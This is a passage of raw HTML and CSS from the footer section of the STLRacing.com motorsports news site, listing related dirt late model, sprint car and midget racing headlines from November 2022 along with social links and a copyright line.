				    border: 1px solid rgba(255,163,1,0.5);
				}.tdi_71 .tdm-social-text{
					margin-left: 8px;
				
					margin-right: 26px;
				
				    font-family:Heebo !important;font-size:12px !important;font-weight:500 !important;
				}
}

/* phone */
@media (max-width: 767px){
.tdi_71 .tdm-social-item i{
					font-size: 13px;
					vertical-align: middle;
				
					line-height: 32.5px;
				}.tdi_71 .tdm-social-item i.td-icon-twitter,
				.tdi_71 .tdm-social-item i.td-icon-linkedin,
				.tdi_71 .tdm-social-item i.td-icon-pinterest,
				.tdi_71 .tdm-social-item i.td-icon-blogger,
				.tdi_71 .tdm-social-item i.td-icon-vimeo{
					font-size: 10.4px;
				}.tdi_71 .tdm-social-item{
					width: 32.5px;
					height: 32.5px;
				
				    margin: 5px 10px 5px 0;
				}body .tdi_71 .tdm-social-item{
				    border: 1px solid rgba(255,163,1,0.5);
				}.tdi_71 .tdm-social-text{
					margin-left: 5px;
				
					margin-right: 22px;
				
				    font-family:Heebo !important;font-size:12px !important;font-weight:500 !important;
				}
}
</style><div class="tdm-social-wrapper tds-social4 tdi_71"><div class="tdm-social-item-wrap"><a href="https://www.facebook.com/STLRacing"  target="_blank"  title="Facebook" class="tdm-social-item"><i class="td-icon-font td-icon-facebook"></i></a><a href="https://www.facebook.com/STLRacing"  target="_blank" class="tdm-social-text">Facebook</a></div><div class="tdm-social-item-wrap"><a href="https://www.instagram.com/stlracing"  target="_blank"  title="Instagram" class="tdm-social-item"><i class="td-icon-font td-icon-instagram"></i></a><a href="https://www.instagram.com/stlracing"  target="_blank" class="tdm-social-text">Instagram</a></div><div class="tdm-social-item-wrap"><a href="#"  target="_blank"  title="RSS" class="tdm-social-item"><i class="td-icon-font td-icon-rss"></i></a><a href="#"  target="_blank" class="tdm-social-text">RSS</a></div><div class="tdm-social-item-wrap"><a href="https://www.twitter.com/stlracing"  target="_blank"  title="Twitter" class="tdm-social-item"><i class="td-icon-font td-icon-twitter"></i></a><a href="https://www.twitter.com/stlracing"  target="_blank" class="tdm-social-text">Twitter</a></div></div></div></div></div></div></div><div id="tdi_72" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_73  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_73,
                .tdi_73 .tdc-columns{
                    min-height: 0;
                }.tdi_73,
				.tdi_73 .tdc-columns{
				    display: block;
				}.tdi_73 .tdc-columns{
				    width: 100%;
				}@media (min-width: 768px) {
	                .tdi_73 {
	                    margin-left: -40px;
	                    margin-right: -40px;
	                }
	                .tdi_73 .tdc-row-video-background-error,
	                .tdi_73 .vc_column {
	                    padding-left: 40px;
	                    padding-right: 40px;
	                }
                }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
@media (min-width: 768px) {
	                .tdi_73 {
	                    margin-left: -30px;
	                    margin-right: -30px;
	                }
	                .tdi_73 .tdc-row-video-background-error,
	                .tdi_73 .vc_column {
	                    padding-left: 30px;
	                    padding-right: 30px;
	                }
                }
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
@media (min-width: 768px) {
	                .tdi_73 {
	                    margin-left: -15px;
	                    margin-right: -15px;
	                }
	                .tdi_73 .tdc-row-video-background-error,
	                .tdi_73 .vc_column {
	                    padding-left: 15px;
	                    padding-right: 15px;
	                }
                }
}
/* inline tdc_css att */

.tdi_73{
margin-bottom:80px !important;
}

.tdi_73 .td_block_wrap{ text-align:left }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_73{
margin-bottom:60px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_73{
margin-bottom:50px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.tdi_73{
margin-bottom:55px !important;
}
}

</style><div class="vc_column tdi_75  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_75{
                    vertical-align: baseline;
                }.tdi_75 > .wpb_wrapper,
				.tdi_75 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_75 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_75 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_75 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_75{
margin-bottom:35px !important;
}
}

</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_76 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_76" >
<style>

/* inline tdc_css att */

.tdi_76{
margin-bottom:18px !important;
}

/* phone */
@media (max-width: 767px)
{
.tdi_76{
margin-top:9px !important;
margin-bottom:14px !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_76{
margin-bottom:14px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_76{
margin-bottom:12px !important;
}
}

</style>
<style>
/* custom css */
.tdm_block.tdm_block_inline_text{
                  margin-bottom: 0;
                  vertical-align: top;
                }.tdm_block.tdm_block_inline_text .tdm-descr{
                  margin-bottom: 0;
                  -webkit-transform: translateZ(0);
                  transform: translateZ(0);
                }.tdc-row-content-vert-center .tdm-inline-text-yes{
                  vertical-align: middle;
                }.tdc-row-content-vert-bottom .tdm-inline-text-yes{
                  vertical-align: bottom;
                }.tdi_76{
                    text-align: left !important;
                }.tdi_76 .tdm-descr{
                    color: #666666;
                
					font-family:Heebo !important;font-size:22px !important;font-weight:500 !important;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_76 .tdm-descr{
					font-family:Heebo !important;font-size:20px !important;font-weight:500 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_76 .tdm-descr{
					font-family:Heebo !important;font-size:19px !important;font-weight:500 !important;
				}
}

/* phone */
@media (max-width: 767px){
.tdi_76 .tdm-descr{
					font-family:Heebo !important;font-size:20px !important;font-weight:500 !important;
				}
}
</style><p class="tdm-descr">Articles you may like!</p></div><div class="td_block_wrap td_flex_block_3 tdi_77 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_77" >
<style>

/* inline tdc_css att */

.tdi_77{
margin-bottom:0px !important;
}

</style>
<style>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</style><script>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</script><div class="td-block-title-wrap"></div><div id=tdi_77 class="td_block_inner td-mc1-wrap">
        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" rel="bookmark" class="td-image-wrap " title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/Rocket1-Racing-112822-Josh-James-Artwork-image.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" rel="bookmark" title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run">Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run</a></h3>
                    
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/dirt-late-model-news/" class="td-post-category">Dirt Late Model News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:04:38-06:00" >November 28, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                    <div class="td-excerpt">

2023 Campaign Begins in January at Volusia Speedway Park

SHINNSTON, W.Va. (11/28/22) – Rocket1 Racing and Hudson O’Neal are busily preparing for the 2023 season.

The...</div>
                    
                                    </div>
            </div>
        </div>

        <div class="td_module_column">
        <div class="td_module_flex td_module_flex_3 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/22/ready-to-race-2023-lucas-oil-mlra-tour-dates-set/" rel="bookmark" class="td-image-wrap " title="Ready To Race:  2023 Lucas Oil MLRA Tour Dates Set" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2011/02/MLRA.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/22/ready-to-race-2023-lucas-oil-mlra-tour-dates-set/" rel="bookmark" title="Ready To Race:  2023 Lucas Oil MLRA Tour Dates Set">Ready To Race:  2023 Lucas Oil MLRA Tour Dates Set</a></h3>
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/dirt-late-model-news/" class="td-post-category">Dirt Late Model News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-22T13:09:06-06:00" >November 22, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                                    </div>
            </div>
        </div>

        
        <div class="td_module_flex td_module_flex_3 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/23/heather-lynes-dedication-has-led-to-historic-feats-paving-the-way-for-others-in-the-sport/" rel="bookmark" class="td-image-wrap " title="Heather Lyne’s Dedication Has Led to Historic Feats, Paving The Way For Others In The Sport" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/HeartofaChampionPartII_JacyNorgaardphoto.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/23/heather-lynes-dedication-has-led-to-historic-feats-paving-the-way-for-others-in-the-sport/" rel="bookmark" title="Heather Lyne’s Dedication Has Led to Historic Feats, Paving The Way For Others In The Sport">Heather Lyne’s Dedication Has Led to Historic Feats, Paving The Way For Others In The Sport</a></h3>
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/dirt-late-model-news/" class="td-post-category">Dirt Late Model News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-23T09:10:13-06:00" >November 23, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                                    </div>
            </div>
        </div>

        </div></div></div></div></div><div class="vc_column tdi_79  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_79{
                    vertical-align: baseline;
                }.tdi_79 > .wpb_wrapper,
				.tdi_79 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_79 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_79 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_79 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_79{
margin-bottom:35px !important;
}
}

</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_80 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_80" >
<style>

/* inline tdc_css att */

.tdi_80{
margin-bottom:18px !important;
}

/* phone */
@media (max-width: 767px)
{
.tdi_80{
margin-top:9px !important;
margin-bottom:14px !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_80{
margin-bottom:14px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_80{
margin-bottom:12px !important;
}
}

</style>
<style>
/* custom css */
.tdi_80{
                    text-align: left !important;
                }.tdi_80 .tdm-descr{
                    color: #666666;
                
					font-family:Heebo !important;font-size:22px !important;font-weight:500 !important;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_80 .tdm-descr{
					font-family:Heebo !important;font-size:20px !important;font-weight:500 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_80 .tdm-descr{
					font-family:Heebo !important;font-size:19px !important;font-weight:500 !important;
				}
}

/* phone */
@media (max-width: 767px){
.tdi_80 .tdm-descr{
					font-family:Heebo !important;font-size:20px !important;font-weight:500 !important;
				}
}
</style><p class="tdm-descr">Popular Late Model Articles</p></div><div class="td_block_wrap td_flex_block_3 tdi_81 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_81" >
<style>

/* inline tdc_css att */

.tdi_81{
margin-bottom:0px !important;
}

</style>
<style>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</style><script>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</script><div class="td-block-title-wrap"></div><div id=tdi_81 class="td_block_inner td-mc1-wrap">
        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" rel="bookmark" class="td-image-wrap " title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/Rocket1-Racing-112822-Josh-James-Artwork-image.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/rocket1-racing-and-hudson-oneal-set-for-23-lolmds-title-run/" rel="bookmark" title="Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run">Rocket1 Racing and Hudson O’Neal Set for ’23 LOLMDS Title Run</a></h3>
                    
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/dirt-late-model-news/" class="td-post-category">Dirt Late Model News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:04:38-06:00" >November 28, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                    <div class="td-excerpt">

2023 Campaign Begins in January at Volusia Speedway Park

SHINNSTON, W.Va. (11/28/22) – Rocket1 Racing and Hudson O’Neal are busily preparing for the 2023 season.

The...</div>
                    
                                    </div>
            </div>
        </div>

        <div class="td_module_column">
        <div class="td_module_flex td_module_flex_3 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" class="td-image-wrap " title="Xtreme Outlaw Midget Series Welcomes Bachman as Director" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/XOM_TylerBachman_byJacyNorgaard.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" title="Xtreme Outlaw Midget Series Welcomes Bachman as Director">Xtreme Outlaw Midget Series Welcomes Bachman as Director</a></h3>
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/sprint-car-news/" class="td-post-category">Sprint Car &amp; Midget News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:14:04-06:00" >November 28, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                                    </div>
            </div>
        </div>

        
        <div class="td_module_flex td_module_flex_3 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/" rel="bookmark" class="td-image-wrap " title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/Cory-Hedgecock-112622-Chad-Wells-image.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/" rel="bookmark" title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph">Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph</a></h3>
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/dirt-late-model-news/" class="td-post-category">Dirt Late Model News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:43:12-06:00" >November 28, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                                    </div>
            </div>
        </div>

        </div></div></div></div></div><div class="vc_column tdi_83  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_83{
                    vertical-align: baseline;
                }.tdi_83 > .wpb_wrapper,
				.tdi_83 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_83 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_83 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_83 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_84 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_84" >
<style>

/* inline tdc_css att */

.tdi_84{
margin-bottom:18px !important;
}

/* phone */
@media (max-width: 767px)
{
.tdi_84{
margin-top:9px !important;
margin-bottom:14px !important;
}
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_84{
margin-bottom:14px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_84{
margin-bottom:12px !important;
}
}

</style>
<style>
/* custom css */
.tdi_84{
                    text-align: left !important;
                }.tdi_84 .tdm-descr{
                    color: #666666;
                
					font-family:Heebo !important;font-size:22px !important;font-weight:500 !important;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_84 .tdm-descr{
					font-family:Heebo !important;font-size:20px !important;font-weight:500 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_84 .tdm-descr{
					font-family:Heebo !important;font-size:19px !important;font-weight:500 !important;
				}
}

/* phone */
@media (max-width: 767px){
.tdi_84 .tdm-descr{
					font-family:Heebo !important;font-size:20px !important;font-weight:500 !important;
				}
}
</style><p class="tdm-descr">Popular Sprint Car Articles</p></div><div class="td_block_wrap td_flex_block_3 tdi_85 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_85" >
<style>

/* inline tdc_css att */

.tdi_85{
margin-bottom:0px !important;
}

</style>
<style>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</style><script>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</script><div class="td-block-title-wrap"></div><div id=tdi_85 class="td_block_inner td-mc1-wrap">
        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" class="td-image-wrap " title="Xtreme Outlaw Midget Series Welcomes Bachman as Director" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/XOM_TylerBachman_byJacyNorgaard.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" title="Xtreme Outlaw Midget Series Welcomes Bachman as Director">Xtreme Outlaw Midget Series Welcomes Bachman as Director</a></h3>
                    
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/sprint-car-news/" class="td-post-category">Sprint Car &amp; Midget News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:14:04-06:00" >November 28, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                    <div class="td-excerpt">

CONCORD, NC (Nov. 28, 2022) – The Xtreme Outlaw Midget Series presented by Toyota has named Tyler Bachman as Series Director.

Bachman is a respected...</div>
                    
                                    </div>
            </div>
        </div>

        <div class="td_module_column">
        <div class="td_module_flex td_module_flex_3 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/27/grant-prix-a-dream-victory-for-jg-at-turkey-night/" rel="bookmark" class="td-image-wrap " title="Grant Prix: A Dream Victory for JG at Turkey Night" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/grant4.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/27/grant-prix-a-dream-victory-for-jg-at-turkey-night/" rel="bookmark" title="Grant Prix: A Dream Victory for JG at Turkey Night">Grant Prix: A Dream Victory for JG at Turkey Night</a></h3>
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/sprint-car-news/" class="td-post-category">Sprint Car &amp; Midget News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-27T09:37:53-06:00" >November 27, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                                    </div>
            </div>
        </div>

        
        <div class="td_module_flex td_module_flex_3 td_module_wrap td-animation-stack td-cpt-post">
            <div class="td-module-container td-category-pos-">
                                    <div class="td-image-container">
                                                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/26/1-2-3-for-denney-rookie-tops-turkey-night-usac-midget-practice/" rel="bookmark" class="td-image-wrap " title="1-2-3 For Denney; Rookie Tops Turkey Night USAC Midget Practice" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/denney0.jpg?resize=218%2C150&ssl=1"  ></span></a></div>                                            </div>
                
                <div class="td-module-meta-info">
                                        
                    <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/26/1-2-3-for-denney-rookie-tops-turkey-night-usac-midget-practice/" rel="bookmark" title="1-2-3 For Denney; Rookie Tops Turkey Night USAC Midget Practice">1-2-3 For Denney; Rookie Tops Turkey Night USAC Midget Practice</a></h3>
                                            <div class="td-editor-date">
                                                        <a href="https://www.stlracing.com/category/sprint-car-news/" class="td-post-category">Sprint Car &amp; Midget News</a>
                                                            <span class="td-author-date">
                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-26T09:33:06-06:00" >November 26, 2022</time></span>                                                                                                        </span>
                                                    </div>
                    
                                    </div>
            </div>
        </div>

        </div></div></div></div></div></div></div><div id="tdi_86" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_87  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_87,
                .tdi_87 .tdc-columns{
                    min-height: 0;
                }.tdi_87,
				.tdi_87 .tdc-columns{
				    display: block;
				}.tdi_87 .tdc-columns{
				    width: 100%;
				}
/* inline tdc_css att */

.tdi_87{
margin-bottom:40px !important;
}

.tdi_87 .td_block_wrap{ text-align:left }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_87{
margin-bottom:30px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_87{
margin-bottom:20px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.tdi_87{
margin-bottom:25px !important;
}
}

</style><div class="vc_column tdi_89  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_89{
                    vertical-align: baseline;
                }.tdi_89 > .wpb_wrapper,
				.tdi_89 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_89 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_89 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_89 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_91  td_separator_solid td_separator_center"><span style="border-color:rgba(255,252,252,0.12);border-width:1px;width:100%;"></span>
<style scoped>

/* inline tdc_css att */

.tdi_91{
margin-bottom:0px !important;
}

</style></div></div></div></div></div><div id="tdi_92" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_93  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_93,
                .tdi_93 .tdc-columns{
                    min-height: 0;
                }.tdi_93,
				.tdi_93 .tdc-columns{
				    display: block;
				}.tdi_93 .tdc-columns{
				    width: 100%;
				}@media (min-width: 768px) {
	                .tdi_93 {
	                    margin-left: -40px;
	                    margin-right: -40px;
	                }
	                .tdi_93 .tdc-row-video-background-error,
	                .tdi_93 .vc_column {
	                    padding-left: 40px;
	                    padding-right: 40px;
	                }
                }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
@media (min-width: 768px) {
	                .tdi_93 {
	                    margin-left: -30px;
	                    margin-right: -30px;
	                }
	                .tdi_93 .tdc-row-video-background-error,
	                .tdi_93 .vc_column {
	                    padding-left: 30px;
	                    padding-right: 30px;
	                }
                }
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
@media (min-width: 768px) {
	                .tdi_93 {
	                    margin-left: -15px;
	                    margin-right: -15px;
	                }
	                .tdi_93 .tdc-row-video-background-error,
	                .tdi_93 .vc_column {
	                    padding-left: 15px;
	                    padding-right: 15px;
	                }
                }
}
/* inline tdc_css att */

.tdi_93{
padding-bottom:25px !important;
}

.tdi_93 .td_block_wrap{ text-align:left }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_93{
padding-bottom:15px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_93{
padding-bottom:10px !important;
}
}

/* phone */
@media (max-width: 767px)
{
.tdi_93{
padding-bottom:10px !important;
}
}

</style><div class="vc_column tdi_95  wpb_column vc_column_container tdc-column td-pb-span6">
<style scoped>

/* custom css */
.tdi_95{
                    vertical-align: baseline;
                }.tdi_95 > .wpb_wrapper,
				.tdi_95 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_95 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_95 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_95 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_96 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_96" >
<style>

/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_96{
margin-bottom:10px !important;
justify-content:center !important;
text-align:center !important;
}
}

</style>
<style>
/* custom css */
.tdi_96{
                    text-align: left !important;
                }.tdi_96 .tdm-descr{
                    color: #777777;
                
					font-family:Heebo !important;font-size:14px !important;line-height:1.6 !important;font-weight:500 !important;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_96 .tdm-descr{
					font-family:Heebo !important;font-size:13px !important;line-height:1.6 !important;font-weight:500 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_96 .tdm-descr{
					font-family:Heebo !important;font-size:12px !important;line-height:1.6 !important;font-weight:500 !important;
				}
}

/* phone */
@media (max-width: 767px){
.tdi_96 .tdm-descr{
					font-family:Heebo !important;font-size:12px !important;line-height:1.6 !important;font-weight:500 !important;
				}
}
</style><p class="tdm-descr">© Copyright - STLRacing.com</p></div></div></div><div class="vc_column tdi_98  wpb_column vc_column_container tdc-column td-pb-span6">
<style scoped>

/* custom css */
.tdi_98{
                    vertical-align: baseline;
                }.tdi_98 > .wpb_wrapper,
				.tdi_98 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_98 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_98 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_98 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
/* inline tdc_css att */

.tdi_98{
justify-content:flex-end !important;
text-align:right !important;
}

</style><div class="wpb_wrapper"><div class="td_block_wrap td_block_list_menu tdi_99 td-pb-border-top td_block_template_1 widget"  data-td-block-uid="tdi_99" >
<style>

/* inline tdc_css att */

.tdi_99{
margin-bottom:0px !important;
}

/* desktop */ @media(min-width: 1141px) { .tdi_99 { 
display:inline-block !important;
} }

</style>
<style>
/* custom css */
.td_block_list_menu ul{
                  flex-wrap: wrap;
                  margin-left: 12px;
                }.td_block_list_menu ul li{
                  margin-left: 0;
                }.td_block_list_menu .sub-menu{
                  padding-left: 22px;
                }.td_block_list_menu .sub-menu li{
                  font-size: 13px;
                }.td_block_list_menu li.current-menu-item > a,
